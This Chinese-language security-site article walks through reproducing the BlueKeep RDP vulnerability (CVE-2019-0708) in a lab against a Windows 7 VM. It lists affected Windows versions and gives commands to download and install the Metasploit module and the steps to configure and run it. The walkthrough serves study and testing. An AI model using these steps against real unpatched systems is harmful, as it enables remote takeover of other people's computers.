标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2650] 作者: 浩丶轩 发表于: [2020-04-24]
本文共 [329] 位读者顶过
2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作 影响版本
[出自:jiwo.org] 该漏洞影响旧版本的Windows系统,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。 Windows 8和Windows 10及之后版本不受此漏洞影响。 漏洞测试环境 攻击机:kali ip:192.168.0.129
靶机:win7 ip:192.168.0.133 下载攻击套件
wget https://raw.githubusercontent.co ... core/exploit/rdp.rb 将下面的exp分别进行替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 更新msf apt-get update apt-get install metasploit-framework 更新之后可能显示要更新一个插件 更新了之后就可以正常使用了 打开虚拟机win7 开放3389端口 打开kali启动msf 搜索0708,可以看到文件成功加载
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块攻击 用show options进行参数设置 这里只需要设置两项,set rhosts 目标ip(我这里是192.168.0.132,以及set target 3
set target ID数字(可选为0-4)设置受害机机器架构,wmware=3,Virtualbox=2成功利用。 有部分能成功拿到权限 到目前公开的利用代码可用于攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定,针对 Windows 7 SP1 x64攻击有蓝屏现象。 |